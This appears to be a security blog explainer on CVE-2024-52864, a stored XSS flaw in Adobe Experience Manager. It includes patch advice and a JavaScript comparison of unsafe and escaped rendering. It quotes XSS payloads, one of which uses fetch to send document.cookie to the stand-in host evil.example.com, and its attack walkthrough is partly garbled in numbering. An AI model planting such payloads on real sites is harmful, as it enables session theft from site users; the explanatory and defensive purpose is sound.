CVE-2024-52864 is a newly reported security flaw affecting Adobe Experience Manager versions 6.5.21 and earlier. This is a stored Cross-Site Scripting (XSS) vulnerability, which means attackers can inject and permanently store malicious scripts on AEM-powered websites. When unsuspecting users view the affected pages or forms, these scripts run in their browsers, letting attackers steal session cookies, perform actions on behalf of the user, or redirect them to malicious websites.
Let’s break down how this vulnerability works, see example code a hacker might use, and discuss how to protect your site.
## What Is Stored XSS?
In a stored XSS attack, malicious code is saved (“stored”) in a web application, such as in a form field or comment section. Whenever someone views the web page, the harmful code gets sent to their browser and runs as if it were trusted page content.
If your application doesn’t properly sanitize user inputs, attackers can exploit this to execute JavaScript in the context of your domain.
## Where’s the Vulnerability?
Adobe Experience Manager (AEM) is an enterprise CMS widely used to manage digital assets and web content. In versions 6.5.21 and earlier, certain form fields within the system are not properly sanitized. Attackers can input JavaScript payloads in these fields, and the content is later displayed on web pages without being filtered.
Adobe’s official details
- Security Bulletin: APSB24-38
## Let’s See It In Action
Imagine a website using AEM where users can fill out and submit a feedback form. The “comments” field is vulnerable. Here’s how an attacker might exploit this:
The attacker submits a comment like:

```html
<script>alert('XSS by Hacker!');</script>
```
3. When Someone Views the Page
Later, another user (or an administrator) browses to the page that displays this stored comment. When their browser loads the page, the JavaScript runs.
A more dangerous payload might harvest cookies or session tokens:

```html
<script>
fetch('https://evil.example.com/steal?cookie=' + document.cookie);
</script>
```
When executed, this script sends the user’s cookie information to the attacker’s server.
## Full Attack Walkthrough
1. Attacker finds a vulnerable form (e.g., /content/we-retail/feedback.html).
Any user who visits the page triggers the embedded script.
5. Attacker gains control/functions in the user’s browser.
Can be used to spread further malware.
## Patch/Prevention
Upgrade AEM to version 6.5.22 or later. Adobe has fixed the vulnerability in the latest patch release:
- Adobe Experience Manager Security Updates
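
The root cause described above (a stored form field echoed into a page without filtering) is shown here beside its output-encoded form. This is an added example, not Adobe's code or AEM's rendering pipeline: it is a plain JavaScript stand-in, and the sample data and all function names (`escapeHtml`, `renderUnsafe`, `renderSafe`, `hasLiveScriptTag`) are hypothetical.

```javascript
// Added illustration: a plain JavaScript stand-in for a page that lists stored
// feedback comments. None of this is AEM code; all names are hypothetical.

// Constructed sample data: one ordinary comment plus the two payloads quoted
// earlier on this page, as they would sit in storage.
const storedComments = [
  'Great site & "fast" checkout',
  "<script>alert('XSS by Hacker!');</script>",
  "<script>fetch('https://evil.example.com/steal?cookie=' + document.cookie);</script>",
];

const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Encode a value for an HTML text or quoted-attribute context. The value is
// coerced to a string first so null, undefined or numeric fields cannot
// bypass encoding.
function escapeHtml(value) {
  return String(value ?? '').replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Vulnerable pattern: stored text is concatenated into markup unchanged,
// so a stored <script> element reaches the browser as live markup.
function renderUnsafe(comments) {
  return '<ul>' + comments.map((c) => '<li>' + c + '</li>').join('') + '</ul>';
}

// Hardened pattern: every stored value is encoded at output time, so the
// same payloads are displayed as inert text.
function renderSafe(comments) {
  return '<ul>' + comments.map((c) => '<li>' + escapeHtml(c) + '</li>').join('') + '</ul>';
}

// Regression check for a template: did any stored value survive as a script tag?
function hasLiveScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log(
  hasLiveScriptTag(renderUnsafe(storedComments)),
  hasLiveScriptTag(renderSafe(storedComments)),
); // prints: true false
```

Encoding at output time, rather than only filtering at submission, also neutralizes payloads that were stored before a fix was deployed.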
## Links & References
- Adobe Security Advisory APSB24-38 (CVE-2024-52864)
- OWASP XSS Explained
- Adobe Experience Manager Release Notes
## Conclusion
CVE-2024-52864 highlights why web applications must always treat user inputs as untrusted. Adobe Experience Manager 6.5.21 and earlier are at risk if not updated. Stored XSS is one of the most dangerous vulnerabilities because the attacker can compromise *all* users who visit the infected page. Patch and safeguard your forms now to keep your website and your users out of danger.
Want to check if you’re affected? Try submitting a harmless `<script>alert(1)</script>` in your forms. If you see a popup, your installation is vulnerable—update today!
## Timeline
Published on: 12/10/2024 22:15:22 UTC
Last modified on: 12/13/2024 17:37:46 UTC